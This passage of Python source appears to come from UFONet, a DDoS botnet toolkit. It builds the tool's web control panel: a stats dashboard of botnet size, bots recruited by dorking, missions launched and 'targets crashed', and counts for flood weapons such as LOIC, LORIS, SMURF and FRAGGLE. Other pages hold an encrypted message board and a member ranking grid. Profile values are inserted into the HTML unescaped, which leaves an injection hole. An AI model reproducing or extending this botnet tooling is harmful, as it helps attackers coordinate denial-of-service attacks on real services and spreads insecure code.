  268. self.profile_nick = data["profile_nick"]
  269. self.profile_nick.encode('utf-8')
  270. return self.pages["/header"] + """
  271. <script language="javascript">
  272. function BoardProfile() {
  273. var win_board = window.open("board_profile","_parent","fullscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  274. }
  275. </script>
  276. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" ><center><pre>
  277. <u>Configure profile:</u>
  278. <table cellpadding="2" cellspacing="2">
  279. <form method='GET'>
  280. <tr>
  281. <td> <u>OPERATOR/LINK:</u></td>
  282. <td> """+self.profile_crew(self.profile_icon)+"""</td>
  283. </tr>
  284. <tr>
  285. <td> <u>NICKNAME:</u></td>
  286. <td> <input type="text" name="profile_nick" pattern=".{3,12}" required title="3 to 12 characters" value='"""+self.profile_nick+"""'></td>
  287. </tr>
  288. </table>
  289. <hr>
  290. <input type="hidden" name="update" value="1">
  291. <input type="submit" value="Set!" onclick="BoardProfile()"></pre>
  292. </form>
  293. """ + self.pages["/footer"]
  294. def html_grid_profile(self):
  295. try:
  296. with open(self.mothership_gridcfg_file) as data_file:
  297. data = json.load(data_file)
  298. except:
  299. if os.path.exists(self.mothership_gridcfg_file) == True:
  300. print('[Error] [AI] Cannot open: "core/json/gridcfg.json" -> [Aborting!]\n')
  301. return
  302. else:
  303. print('[Info] [AI] Cannot found: "core/json/gridcfg.json" -> [Generating!]')
  304. with open(self.mothership_gridcfg_file, "w") as f:
  305. json.dump({"grid_token": "NONE", "grid_contact": "UNKNOWN!", "grid_nick": "Anonymous"}, f, indent=4)
  306. f.close()
  307. with open(self.mothership_gridcfg_file) as data_file:
  308. data = json.load(data_file)
  309. self.grid_token = str(random.getrandbits(128)) # generating random token hash
  310. self.grid_contact = data["grid_contact"]
  311. self.grid_contact.encode('utf-8')
  312. self.grid_nick = data["grid_nick"]
  313. self.grid_nick.encode('utf-8')
  314. return self.pages["/header"] + """
  315. <script language="javascript">
  316. function GridProfile() {
  317. var win_board = window.open("grid_profile","_parent","fullscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  318. }
  319. </script>
  320. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" ><center><pre>
  321. <u>Configure grid profile:</u><br>
  322. <table cellpadding="2" cellspacing="2">
  323. <form method='GET'>
  324. <tr>
  325. <td> <u>NICKNAME:</u></td>
  326. <td> <input type="text" name="grid_nick" pattern=".{3,12}" required title="3 to 12 characters" value='"""+self.grid_nick+"""'></td>
  327. </tr>
  328. <tr>
  329. <td> <u>EMAIL/URL (CONTACT):</u></td>
  330. <td> <input type="text" name="grid_contact" pattern=".{8,120}" required title="8 to 120 characters" value='"""+self.grid_contact+"""'></td>
  331. </tr>
  332. </table>
  333. <hr>
  334. <input type="hidden" name="update" value="1">
  335. <input type="submit" value="Set!" onclick="GridProfile()"></pre>
  336. </form>
  337. """ + self.pages["/footer"]
  338. def html_board_remove(self):
  339. try:
  340. with open(self.mothership_boardcfg_file, "w") as f:
  341. json.dump({"profile_token": "NONE", "profile_icon": "NONE", "profile_nick": "Anonymous"}, f, indent=4)
  342. except:
  343. return
  344. return self.pages["/header"]+"""<script>
  345. window.setTimeout(window.close,1234)
  346. </script></head><body bgcolor="black" text="yellow" style="font-family:Courier, 'Courier New', monospace;" >
  347. <center>Board profile updated. Re-enter to see changes..."""+self.pages["/footer"]
  348. def html_grid_remove(self):
  349. try:
  350. with open(self.mothership_gridcfg_file, "w") as f:
  351. json.dump({"grid_token": "NONE", "grid_contact": "UNKNOWN!", "grid_nick": "Anonymous"}, f, indent=4)
  352. except:
  353. return
  354. return self.pages["/header"]+"""<script>
  355. window.setTimeout(window.close,1234)
  356. </script></head><body bgcolor="black" text="yellow" style="font-family:Courier, 'Courier New', monospace;" >
  357. <center>Grid profile updated. Re-enter to see changes..."""+self.pages["/footer"]
  358. def html_stats(self):
  359. total_extra_attacks = int(self.aloic) + int(self.aloris) + int(self.aufosyn) + int(self.aspray) + int(self.asmurf) + int(self.axmas) + int(self.anuke) + int(self.atachyon) + int(self.amonlist) + int(self.afraggle) + int(self.asniper) + int(self.aufoack) + int(self.auforst) + int(self.adroper) + int(self.aoverlap) + int(self.apinger) + int(self.aufoudp)
  360. if self.ranking == "Rookie": # Rookie
  361. your_ranking = "<font color='white'>Rookie [*]</font>"
  362. elif self.ranking == "Mercenary": # Mercenary
  363. your_ranking = "<font color='cyan'>Mercenary [**]</font>"
  364. elif self.ranking == "Bandit": # Bandit
  365. your_ranking = "<font color='blueviolet'>Bandit [***]</font>"
  366. elif self.ranking == "UFOmmander!": # UFOmmander!
  367. your_ranking = "<font color='blue'>UFOmmander! [****]</font>"
  368. elif self.ranking == "UFOl33t!": # UFOl33t!
  369. your_ranking = "<font color='red'>UFOl33t! [&#x25BC;]</font>"
  370. else:
  371. your_ranking = "<font color='yellow' size='4'>[-]</font> ( no0b! )" # no0b hacking attempt! ;-)
  372. return self.pages["/header"] + """<script language="javascript">
  373. function Ranking() {
  374. var win_ranking = window.open("ranking","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  375. }
  376. function Grid() {
  377. var win_grid = window.open("grid","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  378. }
  379. function Board() {
  380. var win_board = window.open("board","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  381. }
  382. function Links() {
  383. var win_links = window.open("links","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  384. }
  385. function Streams() {
  386. var win_streams = window.open("streams","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  387. }
  388. </script></head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  389. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  390. <center>
  391. <table cellpadding="5" cellspacing="5"><tr>
  392. <td><a href="javascript:alert('CR1SPR-9-AI says: This is your ship, """ + self.ranking + """... Not bad, Eeeeh!?.');"><img src='data:image/png;base64,"""+self.mothership_img+"""'></a></td><td>
  393. <td>STATS device: <font color='green'>ON</font><br><br><button title="Review stats from other motherships and share yours with them..." onclick="Grid()">VISIT GRID!</button> <button title="Visit ranking stats..." onclick="Ranking()">VISIT RANKING!</button> <br><br> <button title="Visit board panel..." onclick="Board()">VISIT BOARD!</button> <button title="Visit data links..." onclick="Links()">VISIT LINKS!</button> <button title="Visit TV.streams..." onclick="Streams()">VISIT STREAMS!</button></td>
  394. </tr></table>
  395. <table border="0" cellpadding="5" cellspacing="10"><tr><td>
  396. <table border="1" cellpadding="5" cellspacing="10"><tr>
  397. <td><b><u>General:</u></b></td></tr>
  398. <tr>
  399. <td>RANKING:</td><td align='right'>""" + str(your_ranking) + """</td></tr>
  400. <tr><td>Flying (times):</td><td align='right'><font color='red'>""" + str(self.aflying) + """</font></td></tr>
  401. </table>
  402. <br>
  403. <table border="1" cellpadding="5" cellspacing="10"><tr>
  404. <td><b><u>Missions:</u></b></td></tr>
  405. <tr>
  406. <td>Created (launched):</td><td align='right'><font color='red'>""" + str(self.amissions) + """</font></td></tr>
  407. <tr>
  408. <td>Attacks (completed):</td><td align='right'><font color='blue'>""" + str(self.acompleted) + """</font></td></tr>
  409. <tr>
  410. <td>Targets (crashed):</td><td align='right'><font color='green'>""" + str(self.tcrashed) + """</font></td></tr>
  411. <tr>
  412. <td>Crashing (T*100/A=C%):</td><td align='right'><font color='orange'>""" + str(round(self.mothership_acc, 2)) + """%</font></td></tr>
  413. </table>
  414. </td><td>
  415. <table border="1" cellpadding="5" cellspacing="10"><tr>
  416. <td><b><u>Botnet:</u></b></td></tr>
  417. <tr>
  418. <td>Total Cargo (now):</td><td align='right'><a href='javascript:runCommandX("cmd_list_army")'>"""+ self.total_botnet +"""</a></td></tr>
  419. <tr>
  420. <td>Scanner (new bots via dorking):</td>
  421. <td align='right'><font color='blue'>""" + str(self.ascanner) + """</font></td></tr>
  422. <tr>
  423. <td>Transferred (new bots via blackholes):</td>
  424. <td align='right'><font color='green'>""" + str(self.atransferred) + """</font></td></tr>
  425. <tr>
  426. <td>Max. Chargo (always): </td><td align='right'><font color='orange'>""" + str(self.amax_chargo) + """</font></td></tr>
  427. </table>
  428. <br>
  429. <table border="1" cellpadding="5" cellspacing="10"><tr>
  430. <td><b><u>Weapons (use):</u></b></td></tr>
  431. <tr>
  432. <td>LOIC:</td><td align='right'><font color='cyan'>""" + str(self.aloic) + """</font></td>
  433. <td>MONLIST:</td><td align='right'><font color='cyan'>""" + str(self.amonlist) + """</font></td>
  434. <td>LORIS:</td><td align='right'><font color='cyan'>""" + str(self.aloris) + """</font></td></tr>
  435. <tr>
  436. <td>UFOSYN:</td><td align='right'><font color='cyan'>""" + str(self.aufosyn) + """</font></td>
  437. <td>FRAGGLE:</td><td align='right'><font color='cyan'>""" + str(self.afraggle) + """</font></td>
  438. <td>SPRAY:</td><td align='right'><font color='cyan'>""" + str(self.aspray) + """</font></td></tr>
  439. <tr>
  440. <td>SMURF:</td><td align='right'><font color='cyan'>""" + str(self.asmurf) + """</font></td>
  441. <td>SNIPER:</td><td align='right'><font color='cyan'>""" + str(self.asniper) + """</font></td>
  442. <td>XMAS:</td><td align='right'><font color='cyan'>""" + str(self.axmas) + """</font></td></tr>
  443. <tr>
  444. <td>NUKE:</td><td align='right'><font color='cyan'>""" + str(self.anuke) + """</font></td>
  445. <td>UFOACK:</td><td align='right'><font color='cyan'>""" + str(self.aufoack) + """</font></td>
  446. <td>TACHYON:</td><td align='right'><font color='cyan'>""" + str(self.atachyon) + """</font></td></tr>
  447. <tr>
  448. <td>UFORST:</td><td align='right'><font color='cyan'>""" + str(self.auforst) + """</font></td>
  449. <td>DROPER:</td><td align='right'><font color='cyan'>""" + str(self.adroper) + """</font></td>
  450. <td>OVERLAP:</td><td align='right'><font color='cyan'>""" + str(self.aoverlap) + """</font></td></tr>
  451. <tr>
  452. <td>PINGER:</td><td align='right'><font color='cyan'>""" + str(self.apinger) + """</font></td>
  453. <td>UFOUDP:</td><td align='right'><font color='cyan'>""" + str(self.aufoudp) + """</font></td>
  454. <td>TOTAL:</td><td align='right'><font color='red'>""" + str(total_extra_attacks) +"""</font></td>
  455. </tr>
  456. </table>
  457. </td></tr></table>
  458. <br><hr>
  459. <div id="cmdOut"></div>
  460. """ + self.pages["/footer"]
  461. def hmac_sha1(self, key, msg):
  462. if len(key) > 20:
  463. key = sha1(key).digest()
  464. key += chr(0).encode('utf-8') * (20 - len(key))
  465. o_key_pad = key.translate(self.trans_5C)
  466. i_key_pad = key.translate(self.trans_36)
  467. return sha1(o_key_pad + sha1(i_key_pad + msg).digest()).digest()
  468. def derive_keys(self, key):
  469. key = key.encode('utf-8')
  470. h = sha256()
  471. h.update(key)
  472. h.update('cipher'.encode('utf-8'))
  473. cipher_key = h.digest()
  474. h = sha256()
  475. h.update(key)
  476. h.update('mac'.encode('utf-8'))
  477. mac_key = h.digest()
  478. return (cipher_key, mac_key)
  479. def decrypt(self, key, text):
  480. KEY_SIZE = 32
  481. BLOCK_SIZE = 16
  482. MAC_SIZE = 20
  483. mode = AES.MODE_CFB
  484. try:
  485. iv_ciphertext_mac = base64.urlsafe_b64decode(text)
  486. except:
  487. try:
  488. padding = len(text) % 4
  489. if padding == 1:
  490. return ''
  491. elif padding == 2:
  492. text += b'=='
  493. elif padding == 3:
  494. text += b'='
  495. iv_ciphertext_mac = base64.urlsafe_b64decode(text)
  496. except TypeError:
  497. return None
  498. iv = iv_ciphertext_mac[:BLOCK_SIZE]
  499. ciphertext = iv_ciphertext_mac[BLOCK_SIZE:-MAC_SIZE]
  500. mac = iv_ciphertext_mac[-MAC_SIZE:]
  501. (cipher_key, mac_key) = self.derive_keys(key)
  502. expected_mac = self.hmac_sha1(mac_key, iv + ciphertext)
  503. if mac != expected_mac:
  504. return None
  505. aes = AES.new(cipher_key, mode, iv)
  506. self.decryptedtext = aes.decrypt(ciphertext)
  507. try:
  508. self.decryptedtext = self.decryptedtext.decode('utf-8')
  509. except:
  510. pass
  511. def encrypt(self, key, text):
  512. try:
  513. key = base64.b64encode(str(key))
  514. except:
  515. key = base64.b64encode(key.encode('utf-8'))
  516. c = Cipher(key, text)
  517. msg = c.encrypt()
  518. try:
  519. msg = msg.decode('utf-8')
  520. except:
  521. pass
  522. c.set_text(msg)
  523. self.encryptedtext = str(msg)
  524. def html_news(self):
  525. return self.pages["/header"] + """<script language="javascript">
  526. function Decrypt(){
  527. news_key=document.getElementById("news_key").value
  528. if(news_key == "") {
  529. window.alert("You need to enter a valid key (provided by someone)");
  530. return
  531. }else{
  532. params="news_key="+escape(news_key)
  533. runCommandX("cmd_decrypt",params)
  534. document.getElementById("nb1").style.display = "none";
  535. }
  536. }
  537. </script>
  538. <script language="javascript">
  539. function RefreshNews(){
  540. news_source=document.getElementById("news_source").value
  541. if(news_source == "") {
  542. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  543. return
  544. }else{
  545. params="news_source="+escape(news_source)
  546. runCommandX("cmd_refresh_news",params)
  547. document.getElementById("nb1").style.display = "none";
  548. setTimeout("location.reload()", 10000)
  549. }
  550. }
  551. </script>
  552. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  553. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  554. <br>
  555. <center><table cellpadding="2" cellspacing="2"><tr><td><table cellpadding="5" cellspacing="5"><tr>
  556. <td>Blackhole/IP:</td>
  557. <td><input type="text" name="news_source" id="news_source" size="20" value='"""+default_blackhole+"""'></td>
  558. </tr></table></td><td><button title="Search for records on that blackhole..." onclick="RefreshNews()" style="color:yellow; height:40px; width:200px; font-weight:bold; background-color:red; border: 2px solid yellow;">Search News...</button></td></tr></table>
  559. <hr>
  560. <table cellpadding="5" cellspacing="5"><tr>
  561. <td><a href="javascript:alert('Psihiz says: """ + self.ranking + """... Welcome to the Crypto-News!...');"><img src='data:image/png;base64,"""+self.alien1_img+"""'></a></td><td>
  562. <table cellpading="5" cellspacing="10"><tr><td>
  563. <form method='GET'>
  564. Your key: <input type="text" name="news_key" id="news_key" size="20" value='"""+str(self.crypto_key)+"""'>
  565. </td></tr><tr><td>
  566. <a style='color:red;text-decoration:underline red;' onclick=javascript:Decrypt();>Try decryption!</a>
  567. </form>
  568. </td></tr></table></td></tr></table>
  569. <hr><br>
  570. </center>
  571. Last update: <font color='"""+ self.news_status_color + """'>"""+ self.news_datetime + """</font><br><br>
  572. <div id="cmdOut"></div>
  573. <div id="nb1" style="display: block;">"""+self.news_text+"""</div><br><br>
  574. """ + self.pages["/footer"]
  575. def html_missions(self):
  576. return self.pages["/header"] + """<script language="javascript">
  577. function Decrypt(){
  578. missions_key=document.getElementById("missions_key").value
  579. if(missions_key == "") {
  580. window.alert("You need to enter a valid key (provided by someone)");
  581. return
  582. }else{
  583. params="missions_key="+escape(missions_key)
  584. runCommandX("cmd_decrypt",params)
  585. document.getElementById("nb1").style.display = "none";
  586. }
  587. }
  588. </script>
  589. <script language="javascript">
  590. function RefreshMissions(){
  591. missions_source=document.getElementById("missions_source").value
  592. if(missions_source == "") {
  593. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  594. return
  595. }else{
  596. params="missions_source="+escape(missions_source)
  597. runCommandX("cmd_refresh_missions",params)
  598. document.getElementById("nb1").style.display = "none";
  599. setTimeout("location.reload()", 10000)
  600. }
  601. }
  602. </script>
  603. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  604. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  605. <br>
  606. <center><table cellpadding="2" cellspacing="2"><tr><td><table cellpadding="5" cellspacing="5"><tr>
  607. <td>Blackhole/IP:</td>
  608. <td><input type="text" name="missions_source" id="missions_source" size="20" value='"""+default_blackhole+"""'></td>
  609. </tr></table></td><td><button title="Search for records on that blackhole..." onclick="RefreshMissions()" style="color:yellow; height:40px; width:200px; font-weight:bold; background-color:red; border: 2px solid yellow;">Search missions...</button></td></tr></table>
  610. <hr>
  611. <table cellpadding="5" cellspacing="5"><tr>
  612. <td><a href="javascript:alert('Mnahät says: """ + self.ranking + """... Welcome to the Crypto-Missions!...');"><img src='data:image/png;base64,"""+self.alien2_img+"""'></a></td><td>
  613. <table cellpading="5" cellspacing="10"><tr><td>
  614. <form method='GET'>
  615. Your key: <input type="text" name="missions_key" id="missions_key" size="20" value='"""+str(self.crypto_key)+"""'>
  616. </td></tr><tr><td>
  617. <a style='color:red;text-decoration:underline red;' onclick=javascript:Decrypt();>Try decryption!</a>
  618. </form>
  619. </td></tr></table></td></tr></table>
  620. <hr><br>
  621. </center>
  622. Last update: <font color='"""+ self.missions_status_color + """'>"""+ self.missions_datetime + """</font><br><br>
  623. <div id="cmdOut"></div>
  624. <div id="nb1" style="display: block;">"""+self.missions_text+"""</div><br><br>
  625. """ + self.pages["/footer"]
  626. def html_board(self):
  627. self.board_welcome = "<div id='board_warning' style='display: none;'><pre><u>WARNING:</u> <br><br> 1) This is our 'Space Cantina': DON'T BE A LAMER!!! <br> 2) NO language RESTRICTIONS <br> 3) ABUSING == #HACKBACK (THIS IS NOT KIND OF FAME YOU WANT)<br> 4) CONTENT can be MODIFIED/REMOVED without notice<br> 5) LOVE, DONATIONS and REPORTS -> <a href='http://127.0.0.1:9999/help' target='_blank'>HERE</a></pre></div>" # board hardcoded warning (hehe)
  628. self.board_topic = "<select id='board_selector'><option value='general'>GENERAL</option><option value='opsec'> - OPSEC: #UFOSTORM</option><option value='faq'>UFONET/FAQ</option><option value='bugs'>UFONET/BUGS</option><option value='media'>UFONET/MEDIA</option></select>"
  629. self.board_send_msg = "<button title='Send your message to the Board (REMEMBER: you will cannot remove it!)...' onclick='SendMessage()'>SEND IT!</button>"
  630. if '"profile_token": "NONE"' in open(self.mothership_boardcfg_file).read():
  631. device_state = "OFF"
  632. device = "BOARD device: <font color='red'>OFF</font><br>"
  633. else:
  634. device_state = "ON"
  635. self.moderator_text = ''.join(random.sample(self.moderator_text,len(self.moderator_text)))
  636. boardcfg_json_file = open(self.mothership_boardcfg_file, "r") # extract mothership boardcfg
  637. data = json.load(boardcfg_json_file)
  638. boardcfg_json_file.close()
  639. profile_token = data["profile_token"]
  640. profile_icon = data["profile_icon"]
  641. profile_nick = data["profile_nick"]
  642. self.profile_nick.encode('utf-8')
  643. operator_img = open("core/images/crew/"+profile_icon+".txt").read()
  644. device = "<u>OPERATOR/LINK:</u> <font color='green'>ON</font><br><table cellpadding='5'><tr><td><img src='data:image/png;base64,"+operator_img+"'></td></tr><tr><td> -NICKNAME: "+str(self.profile_nick)+"</td></tr><tr><td> -ID: "+str(profile_token)+"</td></tr></table>"
  645. if device_state == "OFF":
  646. board_filter = ""
  647. else:
  648. board_filter = "<table cellpadding='5' border='1'><tr><td><input type='radio' name='filter' id='filter_all' value='ALL' CHECKED>/ALL<br> </td><td><input type='radio' name='filter' id='filter_general' value='GENERAL'>/GENERAL</td><td><input type='radio' name='filter' id='filter_opsec' value='OPSEC'>/#OPSEC<br> </td><td><input type='radio' name='filter' id='filter_faq' value='FAQ'>/FAQ</td><td><input type='radio' name='filter' id='filter_bugs' value='BUGS'>/BUGS</td><td><input type='radio' name='filter' id='filter_media' value='MEDIA'>/MEDIA</td></tr></table>"
  649. if device_state == "OFF":
  650. sync_panel = ""
  651. else:
  652. sync_panel = "<table cellpadding='2' cellspacing='2'><tr><td><table cellpadding='5' cellspacing='5'><tr><td>Blackhole/IP:</td><td><input type='text' name='board_source' id='board_source' size='20' value='"+default_blackhole+"'></td></tr></table></td><td><button title='Search for records on that blackhole...' onclick='SyncBoard()' style='color:yellow; height:40px; width:200px; font-weight:bold; background-color:red; border: 2px solid yellow;'>Sync device...</button></td></tr></table><br><hr>"
  653. if device_state == "OFF":
  654. board_panel = ""
  655. else:
  656. with open(self.board_file) as f:
  657. for line in f:
  658. line = line.strip()
  659. self.board_warning += "\n" + " " + line + " " + "\n"
  660. f.close()
  661. self.moderator_text = re.sub("(.{100})", "\\1\n", self.moderator_text, 0, re.DOTALL) # regex magics! (set visual stream to 100 chars after \n)
  662. l = time.ctime(os.path.getmtime(self.board_file)) # get last modified time
  663. board_panel = "<form method='GET'><table cellpadding='5'><tr><td><table cellpadding='10' border='1'><tr><td><table cellpadding='10' border='1'><tr><td> <input type='radio' name='board_action' id='read' onclick='javascript:OptionsCheck();' CHECKED> READ<br> </td><td> <input type='radio' name='board_action' id='write' onclick='javascript:OptionsCheck();'> WRITE<br></td></tr></table></td><td> KEY: <input type='text' name='board_key' id='board_key' size='20' value='"+str(self.crypto_key)+"'> </td></tr></table></td><td><div style='display:block' id='board_read'><table cellpadding='5'><tr><td>"+board_filter+"</td></tr><tr><td><a style='color:red;text-decoration:underline red;' onclick=javascript:Decrypt_board();>Try decryption!</a></td></tr></table></div></td></tr><tr><td>"+self.board_welcome+"</td><td><div style='display:none' id='board_send'><table cellpadding='10' border='1'><tr><td><table cellpadding='10' border='1'><tr><td>Blackhole/IP:</td><td><input type='text' name='board_source_send' id='board_source_send' size='20' value='"+default_blackhole+"'></td></tr><tr><td>TOPIC:</td><td>"+self.board_topic+"</td></tr><tr><td>MESSAGE:</td><td><textarea rows='3' cols='50' name='stream_txt' id='stream_txt' maxlength='140' placeholder='Enter your message (1-140 chars)...'></textarea></td></tr><tr><td>"+self.board_send_msg+"</td></tr></table></td></tr></table></div></td></tr></table></form><br><hr><br><div id='sync_panel_block' name='sync_panel_block' style='display:none;'>"+sync_panel+"<br></div><u>CRYPTO-BOARD</u>: (Last Update: <font color='green'>"+str(l)+"</font>)<br><br><div id='cmdOut'></div><div id='nb1' style='display: block;'>"+self.moderator_text+"</div><br><br>"
  664. if device_state == "OFF":
  665. remove_profile = ""
  666. else:
  667. remove_profile = '| <button title="Syncronize data from a blackhole/board with your device..." onclick="Sync_panel()">DOWNLOAD!</button> | <button title="Remove your profile and turn OFF this device..." onclick="RemoveProfile()">TURN OFF!</button>'
  668. return self.pages["/header"] + """<script language="javascript">
  669. function BoardProfile() {
  670. var win_board_profile = window.open("board_profile","_parent","fullscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  671. }
  672. function RemoveProfile() {
  673. var win_board_profile = window.open("board_remove","_parent","fullscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  674. }
  675. function Decrypt_board(){
  676. board_key=document.getElementById("board_key").value
  677. if (document.getElementById('filter_all').checked) {
  678. filter = document.getElementById('filter_all').value;
  679. }
  680. if (document.getElementById('filter_general').checked) {
  681. filter = document.getElementById('filter_general').value;
  682. }
  683. if (document.getElementById('filter_opsec').checked) {
  684. filter = document.getElementById('filter_opsec').value;
  685. }
  686. if (document.getElementById('filter_faq').checked) {
  687. filter = document.getElementById('filter_faq').value;
  688. }
  689. if (document.getElementById('filter_bugs').checked) {
  690. filter = document.getElementById('filter_bugs').value;
  691. }
  692. if (document.getElementById('filter_media').checked) {
  693. filter = document.getElementById('filter_media').value;
  694. }
  695. if(board_key == "") {
  696. window.alert("You need to enter a valid key (provided by someone)");
  697. return
  698. }else{
  699. params="board_key="+escape(board_key)+"&filter="+escape(filter)
  700. runCommandX("cmd_decrypt_moderator_board",params)
  701. document.getElementById("nb1").style.display = "none";
  702. }
  703. }
  704. function OptionsCheck() {
  705. if (document.getElementById('read').checked) {
  706. document.getElementById('board_read').style.display = 'block';
  707. document.getElementById('board_send').style.display = 'none';
  708. document.getElementById('board_warning').style.display = 'none';
  709. }
  710. else if(document.getElementById('write').checked) {
  711. document.getElementById('board_send').style.display = 'block';
  712. document.getElementById('board_warning').style.display = 'block';
  713. document.getElementById('board_read').style.display = 'none';
  714. }
  715. }
  716. function Sync_panel(){
  717. document.getElementById("sync_panel_block").style.display = "block";
  718. }
  719. function SyncBoard(){
  720. document.getElementById('nb1').style.display = 'none';
  721. board_source=document.getElementById("board_source").value
  722. if(board_source == "") {
  723. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  724. return
  725. }else{
  726. params="board_source="+escape(board_source)
  727. runCommandX("cmd_sync_board",params)
  728. setTimeout("location.reload()", 10000)
  729. }
  730. }
  731. </script>
  732. <script language="javascript">
  733. function SendMessage() {
  734. board_source=document.getElementById("board_source_send").value
  735. board_key=document.getElementById("board_key").value
  736. stream_txt=document.getElementById("stream_txt").value
  737. board_selector=document.getElementById("board_selector");
  738. board_topic = board_selector.options[board_selector.selectedIndex].value;
  739. if(board_key == "") {
  740. board_key='"""+str(self.crypto_key)+"""';
  741. }else{
  742. if(stream_txt == "") {
  743. window.alert("You need to enter a message! (~ 1-140 characters)");
  744. return
  745. }else{
  746. if(board_source == "") {
  747. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  748. return
  749. }else{
  750. params="board_source="+escape(board_source)+"&board_key="+escape(board_key)+"&board_topic="+escape(board_topic)+"&stream_txt="+escape(stream_txt)
  751. runCommandX("cmd_send_message_board",params)
  752. setTimeout("location.reload()", 10000)
  753. }
  754. }
  755. }
  756. }
  757. </script>
  758. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  759. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  760. <br>
  761. <center>
  762. <table cellpadding="5" cellspacing="5"><tr>
  763. <td><a href="javascript:alert('Riättth says: """ + self.ranking + """... Welcome to the Crypto-Board!. You can generate new identities every time that you want. But remember that, this can be a dangerous place. Just respect to others to be respected... Keep safe and enjoy it. COPYCAT!.');"><img src='data:image/png;base64,"""+self.board_img+"""'></a></td><td>
  764. <table cellpading="5" cellspacing="10"><tr><td>"""+device+"""<br><button title="Set your profile for this device..." onclick="BoardProfile()">CONFIGURE!</button> """+remove_profile+"""
  765. </td></tr></table></tr></table>
  766. <hr><br>"""+board_panel+"""
  767. """ + self.pages["/footer"]
  768. def generate_grid(self):
  769. with open(self.grid_file) as f:
  770. for line in f:
  771. line = line.strip()
  772. f.close()
  773. mothership_members = 0 # mothership_members stats bonus
  774. unknown_members = 0 # unknown (or non decrypted) mothership members
  775. grid_table = "<center><u>MEMBERS STATS:</u></center><br><table cellpadding='5' cellspacing='5' border='1'><tr><td align='center'><u>NICKNAME:</u></td><td align='center'><u>RANK:</u></td><td align='center'><u>CHARGO:</u></td><td align='center'><u>DORKING:</u></td><td align='center'><u>TRANSF:</u></td><td align='center'><u>MAX.CHARGO:</u></td><td align='center'><u>MISSIONS:</u></td><td align='center'><u>ATTACKS:</u></td><td align='center'><u>LOIC:</u></td><td align='center'><u>LORIS:</u></td><td align='center'><u>UFOSYN:</u></td><td align='center'><u>SPRAY:</u></td><td align='center'><u>SMURF:</u></td><td align='center'><u>XMAS:</u></td><td align='center'><u>NUKE:</u></td><td align='center'><u>TACHYON:</u></td><td align='center'><u>MONLIST:</u></td><td align='center'><u>FRAGGLE:</u></td><td align='center'><u>SNIPER:</u></td><td align='center'><u>UFOACK:</u></td><td align='center'><u>UFORST:</u></td><td align='center'><u>DROPER:</u></td><td align='center'><u>OVERLAP:</u></td><td align='center'><u>PINGER:</u></td><td align='center'><u>UFOUDP:</u></td><td align='center'><u>CONTACT:</u></td></tr>"
  776. for m in self.list_grid: # msg = nickname, ranking, chargo, dorking, transf, maxchargo, missions, attacks, loic, loris, ufosyn, spray, smurf, xmas, nuke, tachyon, monlist, fraggle, sniper, ufoack, uforst, droper, overlap, pinger, ufoudp, contact, ID
  777. if grid_msg_sep in m:
  778. version = m.count(grid_msg_sep) # check UFONet stream version (made for compatibility with old motherships)
  779. m = m.split(grid_msg_sep)
  780. mothership_members = mothership_members + 1
  781. grid_nickname = m[0][0:12]
  782. grid_nickname = ''.join(random.sample(grid_nickname,len(grid_nickname))) # nickname (obfuscation+str12)
  783. grid_ranking = m[1][0:4] # ranking (is parsed later using a symbol)
  784. grid_ranking = ''.join(random.sample(grid_ranking,len(grid_ranking))) # ranking (obfuscation)
  785. grid_totalchargo = m[2][0:4] # total chargo
  786. grid_totalchargo = ''.join(random.sample(grid_totalchargo,len(grid_totalchargo))) # totalchargo (obfuscation)
  787. grid_dorking = m[3][0:4] # dorking
  788. grid_dorking = ''.join(random.sample(grid_dorking,len(grid_dorking))) # dorking (obfuscation)
  789. grid_transferred = m[4][0:4] # transferred
  790. grid_transferred = ''.join(random.sample(grid_transferred,len(grid_transferred))) # transferred (obfuscation)
  791. grid_maxchargo = m[5][0:4] # maxchargo
  792. grid_maxchargo = ''.join(random.sample(grid_maxchargo,len(grid_maxchargo))) # maxchargo (obfuscation)
  793. grid_missions = m[6][0:4] # missions
  794. grid_missions = ''.join(random.sample(grid_missions,len(grid_missions))) # missions (obfuscation)
